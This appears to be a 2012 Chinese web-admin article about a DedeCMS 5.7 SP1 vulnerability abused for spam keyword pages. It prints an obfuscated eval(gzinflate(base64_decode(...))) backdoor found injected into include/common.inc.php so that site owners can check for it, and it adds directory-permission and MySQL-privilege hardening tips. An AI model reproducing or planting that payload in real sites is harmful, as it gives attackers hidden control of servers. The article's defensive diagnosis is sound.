打印本文 打印本文 关闭窗口 关闭窗口
织梦dedecms5.7sp1被暴漏洞 tags被黑客利用挂马及关键字优化的解决办法
作者:佚名  文章来源:本站原创  点击数3307  更新时间:2012/3/28 13:03:23  文章录入:mintao  责任编辑:mintao

最新织梦dedecms5.7sp1被暴漏洞 tags被黑客利用挂马及关键字优化的解决办法,

昨天一个老客户和我说他的网站莫名其妙的有很多的tags.php页面的关键字在排名有很好的排名。而且全部是垃圾的词。让我帮他检查是否被黑了。

进查阅他的网站发现一切正常的。也没有什么特别现象!而且客户是刚刚升级的dedecms5.7 sp1系统。按理说是不应该出现这种情况啊!

后来经查找相关资料发现!原来织梦dedecms5.7sp1又暴出重要的漏洞了!

发现他原网站有很多的tags.php页面。类似于tags.php?wd=wdgq_fqf 这样的。



如果你网站出现了类似的情况,你看一下include/common.inc.php这个文件,是否出现了下图的那段代码,//特殊全局变量这段代码。

以下是代码片段:
eval(gzinflate(base64_decode("dVJda4MwFH1W8D8EEVTolDLYQ0the3DbwxjDdXsZQ1KNNmCNJHFtKfvvuzF+tG4LQW6u556be06cbJ80gvAEF6SSaIXsKzsQkktWsj3hnpO8RvF7FH+4j+v1S/IGp+TuIXpeu5/+0jIdKBc1zQiHUsw5PnruBtOscWduwVhREggEK5hK7EQF3yNrMszatGBuT0LFQJPjUhBI54wTnG69sx5YIOfLP1kmgkVz5CG4as1EixnHmAEI9TC1Jh0kb1QD9efbMmErqkuMBvkngIw053QZlni+ymlJkoLIJGWVhM7Cs7dS1oswlIcAs8385jpI2S5smjAL5EHaal7D6An+qh/IOyw5UOn1SX/5+zbdgjEICHcaElOk4uAkh/lv/zc4ju6jOIq1u8ZYKCb+qqk6D4cQXO5i7XF30O8gSCHc0Kpos5r9wuHRXMOYWgvXHjw1tHwNL9Vr7dU+F1uqo6jtVj5jSzA46tlPLMWSsmqB7KAj0AK3CrcRSGjoB2GZPw==")));

如果有出现的话,说明你的网站已经被黑了。你首先得找到后门文件,每一个黑客存放后门文件的地方可能都不一样,所以这只能你自己去查找了。删除以后,我们只能等着官方的解决方法了,另外再把自己的目录权限设置一下,这样相信能够解决这种BUG。



1、目录权限
我们不建议用户把栏目目录设置在根目录, 原因是这样进行安全设置会十分的麻烦, 在默认的情况下,安装完成后,目录设置如下:
(1) data、templets、uploads、a或5.3的html目录, 设置可读写,不可执行的权限;
(2) 不需要专题的,建议删除 special 目录, 需要可以在生成HTML后,删除 special/index.php 然后把这目录设置为可读写,不可执行的权限;
(3) include、member、plus、后台管理目录 设置为可执行脚本,可读,但不可写入(安装了附加模块的,book、ask、company、group 目录同样如此设置)。

2、其它需注意问题
(1) 虽然对 install 目录已经进行了严格处理, 但为了安全起见,www.allxing.net依然建议把它删除;
(2) 不要对网站直接使用MySQL root用户的权限,给每个网站设置独立的MySQL用户帐号,许可权限为:
SELECT, INSERT , UPDATE , DELETE
CREATE , DROP , INDEX , ALTER , CREATE TEMPORARY TABLES
由于DEDE并没有任何地方使用存储过程,因此务必禁用 FILE、EXECUTE 等执行存储过程或文件操作的权限。

大家遇到这样的问题。一定要根据以上操作。解决!

打印本文 打印本文 关闭窗口 关闭窗口